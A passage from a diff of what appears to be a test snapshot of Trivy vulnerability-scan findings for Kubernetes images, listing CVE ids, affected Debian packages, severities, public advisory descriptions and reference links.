arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-25013", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-10029", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "iptables", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - "https://access.redhat.com/security/cve/CVE-2020-10029", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - "https://linux.oracle.com/cve/CVE-2020-10029.html", - "https://linux.oracle.com/errata/ELSA-2021-0348.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200327-0003/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, "category": "Vulnerability", - "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-10029", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-10029", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "libapt-pkg6.0", + "references": [ + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", + ], + }, + "category": "Vulnerability", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-27618", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-27618", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - "https://linux.oracle.com/cve/CVE-2020-27618.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210401-0006/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2020-27618", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-27618", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-27618", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2010-4756", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "http://cxib.net/stuff/glob-0day.c", "http://securityreason.com/achievement_securityalert/89", @@ -157256,7 +158065,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ @@ -157302,10 +158111,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2018-20796", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/107160", "https://access.redhat.com/security/cve/CVE-2018-20796", @@ -157319,7 +158128,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ @@ -157365,10 +158174,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010022", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "https://access.redhat.com/security/cve/CVE-2019-1010022", "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", @@ -157381,7 +158190,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: stack guard protection bypass", "references": [ @@ -157423,10 +158232,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010023", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/109167", "https://access.redhat.com/security/cve/CVE-2019-1010023", @@ -157440,7 +158249,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ @@ -157486,10 +158295,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010024", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/109162", "https://access.redhat.com/security/cve/CVE-2019-1010024", @@ -157504,7 +158313,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ @@ -157554,10 +158363,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010025", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "https://access.redhat.com/security/cve/CVE-2019-1010025", "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", @@ -157570,1523 +158379,1065 @@ and the severity is therefore considered low.", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19126", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19126", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - "https://linux.oracle.com/cve/CVE-2019-19126.html", - "https://linux.oracle.com/errata/ELSA-2020-3861.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-19126", - ], - }, - "category": "Vulnerability", - "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19126", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19126", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - }, - { - "type": "URL", - "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - 